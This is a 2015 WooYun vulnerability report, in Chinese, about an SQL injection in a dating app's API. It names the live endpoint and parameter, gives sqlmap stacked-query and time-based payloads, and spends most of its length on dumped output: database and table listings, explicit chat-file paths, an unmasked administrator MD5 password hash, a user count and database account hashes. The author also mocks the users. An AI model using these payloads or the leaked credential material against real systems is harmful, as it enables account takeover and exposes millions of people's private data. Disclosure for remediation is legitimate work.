当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151042

漏洞标题:某同城陌生人交友应用SQL注入数百万用户隐私不保

相关厂商:himoca.com

漏洞作者: Haswell

提交时间:2015-11-01 14:26

修复时间:2015-11-06 14:28

公开时间:2015-11-06 14:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-01: 细节已通知厂商并且等待厂商处理中
2015-11-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

大约6月份时,看这个应用上的聊天话题尺度普遍大,于是。。。。。。
后来因为拖延症一直没空提交。
包含用户绑定的手机 邮箱 密码,聊天记录,视频图片(不忍直视),精确地理位置等等敏感数据。
然后这个应用上的虚拟货币可以以10:1的价格兑换成人民币,还有各种购买机制,所以比较有趣,你懂的。

详细说明:

注入点还算隐蔽,问题出在了一个临时的抽奖页面调用的接口上,当时貌似是Google语法搜到的。

http://api.himoca.com/moca/award/get?uid=1


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: uid (GET)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: uid=1';(SELECT * FROM (SELECT(SLEEP(5)))BNrg)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: uid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))LNQo) AND 'jPbD'='jPbD
---
web application technology: Nginx, PHP 5.6.9
back-end DBMS: MySQL 5.0.11
current database:    'moca'


很不幸恰巧是主数据库

available databases [12]:
[*] information_schema
[*] moca
[*] moca_chat_log
[*] moca_dynamic
[*] moca_group
[*] moca_log
[*] moca_openfire
[*] moca_relation
[*] mysql
[*] openfire_393
[*] performance_schema
[*] test


包含了所有聊天记录,用户数据。
主数据库moca

Database: moca
Table: chat_file
[6 columns]
+-------------+---------------------------+
| Column      | Type                      |
+-------------+---------------------------+
| path        | varchar(256)              |
| create_time | timestamp                 |
| flags       | int(11)                   |
| id          | int(11) unsigned zerofill |
| object_id   | text                      |
| type        | varchar(32)               |
+-------------+---------------------------+


聊天文件,path注入得到后可在cdn上访问,由于聊天话题特殊,所以这里的视频图片都是严重18+的。
例如

select path from chat_file where path like "%.mp4" limit 1,1:    '/data0/moca/applay/dynamic/0f/58/0f**********1c0b7689717b1b0bd416.mp4'


select path from chat_file where path like "%.mp4" limit 210,221 [1]:
[*] /data0/moca/applay/dynamic/2c/0a/2c********c3a93380ca955f3eeb9ad.mp4


饥渴的男女们
用户数据表:

Database: moca
Table: user
[50 columns]
+-------------------+----------------------+
| Column            | Type                 |
+-------------------+----------------------+
| lock              | tinyint(1) unsigned  |
| platform_d\?81   |
| address           | varchar(16)          |
| agent_id          | int(11)              |
| avatar            | varchar(50)          |
| background_img    | varchar(100)         |
| birthday          | date                 |
| career            | smallint(6) unsigned |
| city              | tinyint(4) unsigned  |
| client_version    | int(8) unsigned      |
| country           | char(6)              |
| device_token      | varchar(128)         |
| dynamic_time      | timestamp            |
| email             | varchar(50)          |
| flags             | int(11)              |
| get_flower        | tinyint(1) unsigned  |
| hobby             | varchar(128)         |
| hx_id             | char(32)             |
| hx_pass           | char(32)             |
| integral          | int(10) unsigned     |
| is_auth           | tinyint(1) unsigned  |
| label             | varchar(32)          |
| last_dynamic      | varchar(280)         |
| last_login_ip     | varchar(30)          |
| last_login_time   | timestamp            |
| lat               | double               |
| lng               | double               |
| location          | varchar(16)          |
| login_time        | int(10) unsigned     |
| nickname          | varchar(125)         |
| online            | tinyint(1) unsigned  |
| open_id           | varchar(64)          |
| password          | varchar(32)          |
| phone             | varchar(20)          |
| platform_id_reg   | varchar(45)          |
| platform_name     | varchar(30)          |
| province          | tinyint(4) unsigned  |
| qq_sex_modify     | int(2) unsigned      |
| reg_from          | int(2) unsigned      |
| reg_ip            | varchar(30)          |
| reg_time          | timestamp            |
| region            | tinyint(4) unsigned  |
| replace_hobby     | varchar(128)         |
| replace_nickname  | varchar(125)         |
| replace_signature | varchar(255)         |
| rmb               | int(10) unsigned     |
| sex               | tinyint(1)           |
| share             | smallint(8) unsigned |
| signature         | varchar(255)         |
| uid               | int(11)              |
+-------------------+----------------------+


这个没啥可说的,包括密码md5,绑定手机号,用户账户余额,email,地理位置等
解密后可以登录任意用户账户。
以系统管理员的为例

select uid,nickname,phone,password,rmb from user limit 1,1:    '1311977, 摩擦小秘书, , f379eaf3c831b04de153469d1bec345e, 2465736'


“rmb:2465736”真金白银啊
然后一共多少用户呢

select count(*) from user:    '2852867'


这是六月份时,现在估计有300w了?
恩 差不多就是这样,边边角角的地方一定要注意。

漏洞证明:

web application technology: Nginx, PHP 5.6.9
back-end DBMS: MySQL 5.0.11
available databases [12]:
[*] information_schema
[*] moca
[*] moca_chat_log
[*] moca_dynamic
[*] moca_group
[*] moca_log
[*] moca_openfire
[*] moca_relation
[*] mysql
[*] openfire_393
[*] performance_schema
[*] test
来个全表,
web application technology: Nginx, PHP 5.6.9
back-end DBMS: MySQL 5.0.11
Database: moca
[93 tables]
+-------------------------+
| user |
| advert |
| advert_copy |
| agent |
| agent_user |
| album |
| api_config |
| award |
| award_0316 |
| award_1105 |
| award_1118 |
| award_360_1203 |
| award_sd |
| award_wdj |
| award_wdj1224 |
| bank_config |
| bank_false_msg |
| banner_config |
| banner_config_copy |
| black_ip |
| black_ip_copy |
| captcha |
| channel_info |
| chat_file |
| chat_statistic |
| city |
| click_count |
| click_count_1105 |
| click_count_1118 |
| click_count_1202 |
| click_count_sd |
| click_count_wdj |
| click_count_wdj1224 |
| client_version_config |
| comment |
| cost |
| cost_bak |
| country |
| draw_num |
| draw_num_0316 |
| draw_num_1105 |
| draw_num_1118 |
| draw_num_1202 |
| draw_num_sd |
| draw_num_wdj |
| draw_num_wdj1224 |
| exception_list |
| feedback |
| focus |
| focus_copy |
| ganging |
| ganging_bak |
| gift |
| help |
| image_del |
| label |
| mobile_device |
| model |
| news |
| platform_lock |
| platform_lock_copy |
| play |
| praise |
| purchase |
| report |
| sensitive_words |
| start_img |
| system_config |
| system_messages |
| task |
| task_info |
| temp_user |
| temp_user1 |
| tmp_idfa |
| user4 |
| user_bank |
| user_config |
| user_copy |
| user_device |
| user_device_android |
| user_device_ios |
| user_dynamic |
| user_dynamic_bak |
| user_idfa |
| user_moca |
| user_moca_bak |
| user_notice |
| user_position |
| user_telrecharge_record |
| user_vip |
| user_vip_bak |
| user_withdrawal_record |
| wx_share_user |
+-------------------------+
还有数据库用户密码
web application technology: PHP 5.6.9
back-end DBMS: MySQL 5.0.11
database management system users password hashes:
[*] agent [1]:
password hash: *40DF9***********9AQE8682A19B2D1FSFFB80A1
[*] dbrep [1]:
password hash: *96ECC***********F3CEEE74DF31FC6F13A223DC
[*] moca_modifyuser [1]:
password hash: NULL
[*] monitor [1]:
password hash: *40DF9***********9ABE868271=B2D1FEFFB80A1
[*] replication [1]:
password hash: *40DF9***********9ABE8682719B2a1FEFFBI0A1
[*] root [1]:
password hash: *EADB8***********41808732C0CBD9D85A9D7F7D
[*] zabbix_monitor [1]:
password hash: *9B053***********C860C0B5E2755AE84F71429D

修复方案:

做好边界防范,过滤。
然后waf之类的可以有。
数据库结构是不是应该调整一下。。。。。。
不说安全与否论性能也够蛋疼的。
年底了能不能给张回国机票hhhhhhh

版权声明:转载请注明来源 Haswell@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-06 14:28

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无